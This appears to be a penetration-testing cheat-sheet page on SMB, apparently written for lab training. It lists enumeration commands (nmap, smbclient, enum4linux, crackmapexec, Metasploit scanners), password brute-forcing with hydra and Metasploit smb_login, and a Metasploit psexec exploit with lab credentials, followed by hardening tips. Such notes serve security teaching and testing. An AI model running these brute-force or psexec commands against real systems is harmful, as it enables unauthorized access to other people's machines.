SMB

SMB (Server Message Block) is a protocol used to manage (read, write, share) files on a network composed of Windows machines. It is commonly used to access printers within a network. Files are stored in what are called "shares," each protected by authentication (username and password). In the latest versions of SMB, access rights can be defined for each file. SMB 3.1.1 is the most recent version.

SMB uses port 445 (TCP); however, it originally ran on top of NetBIOS using port 139. SAMBA is the Linux implementation of SMB and allows Windows systems to access Linux shares and devices.

SMB is one of the most commonly exploited attack vectors on Windows systems when proper security mechanisms are not configured, potentially exposing sensitive information to attackers.

Enumeration

Nmap Scripts

nmap --script nbstat.nse <TARGET>
nmap --script smb-os-discovery <TARGET>
nmap --script smb-enum-shares -p139,445 <TARGET>
nmap --script smb-vuln* <TARGET>

nbstat.nse: Gathers NetBIOS names and MAC addresses.
smb-os-discovery: Enumerates OS details via SMB.
smb-enum-shares: Enumerates SMB shares on a target.
smb-vuln*: Checks for SMB vulnerabilities.

Basic Host Discovery

ping -a <TARGET>

NetBIOS Enumeration

nbtscan <TARGET>
nmblookup -A <IP>

nbtscan: Scans IP addresses for NetBIOS name tables.
nmblookup: Queries NetBIOS over TCP/IP (unmaintained as of Samba 4.9).

Session Connection

The IPC$ share allows anonymous connections to perform activities like enumerating domain accounts and shares. Useful commands include:

Null Session Tools

smbclient -L <TARGET_IP> -U ""
rpcclient -U "" -N <TARGET_IP>
enum4linux -a <TARGET_IP>

smbclient -L: Lists available SMB shares.
rpcclient: Interacts with RPC over SMB to enumerate details.
enum4linux: Comprehensive enumeration of SMB and LDAP on the target.

Windows SMB Enumeration

smbmap -H <TARGET>
net view \\<TARGET_IP> /All

smbmap -H <TARGET> -u <USER> -p <PWD>
smbclient //<TARGET_IP>/<SHARE> -U <USER>%<PWD>
crackmapexec smb <TARGET_IP> -u '<USER>' -p '<PWD>' --shares
python3 lookupsid.py <DOMAIN>/<USER>:<PWD>@<TARGET_IP>

smbmap: Lists accessible shares.
crackmapexec: Automates SMB enumeration and testing.
lookupsid.py: Enumerates security identifiers (SID) via SMB (Impacket tool).

Metasploit Framework

Enumerate Shares

use auxiliary/scanner/smb/smb_enumshares
set rhosts <TARGET_IP>
set smbuser <USER>
set smbpass <PWD>
exploit

Enumerate SIDs

use auxiliary/scanner/smb/smb_lookupsid
set rhosts <TARGET_IP>
set smbuser <USER>
set smbpass <PWD>
exploit

use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS <TARGET>
set VERBOSE false
exploit

hydra -l <USER> -P /usr/share/wordlists/metasploit/unix_passwords.txt <TARGET> smb

PsExec

use exploit/windows/smb/psexec
set RHOSTS demo.ine.local
set SMBUser Administrator
set SMBPass qwertyuiop
exploit

Tools Overview

nbtscan: Scans for NetBIOS names across subnets.
smbmap: Lists shares, access levels, and permissions for a target.
smbclient: CLI tool to interact with SMB shares (part of Samba).
crackmapexec: A versatile tool for pentesting Active Directory, SMB, and more.
Impacket Tools: Includes tools like lookupsid.py, smbexec.py, and others for SMB testing.
nmblookup: Queries NetBIOS names over TCP/IP.

NetBIOS Name Types

Type

Hex Code

Description

Unique Names

00

Workstation Service (workstation name)

03

Windows Messenger service

06

Remote Access Service

20

File Service (Host Record)

21

Remote Access Service client

1B

Domain Master Browser (Primary Domain Controller for a domain)

1D

Master Browser

Group Names

00

Workstation Service (workgroup/domain name)

1C

Domain Controllers for a domain

1E

Browser Service Elections

Security Best Practices

Avoid Plaintext Passwords: Use environment variables or credential files instead of inline passwords.
Disable Null Sessions: Configure SMB servers to block unauthenticated access.
Encrypt Traffic: Use SMB over TLS (SMBv3) to protect data in transit.

PreviousFTP NextEnum4linux

Last updated 9 months ago

hashtagEnumeration

hashtagNmap Scripts

hashtagBasic Host Discovery

hashtagNetBIOS Enumeration

hashtagSession Connection

hashtagNull Session Tools

hashtagWindows SMB Enumeration

hashtagUser-Specific Share Access

hashtagMetasploit Framework

hashtagEnumerate Shares

hashtagEnumerate SIDs

hashtagEnumerate Login

hashtagPsExec

hashtagTools Overview

hashtagNetBIOS Name Types

hashtagSecurity Best Practices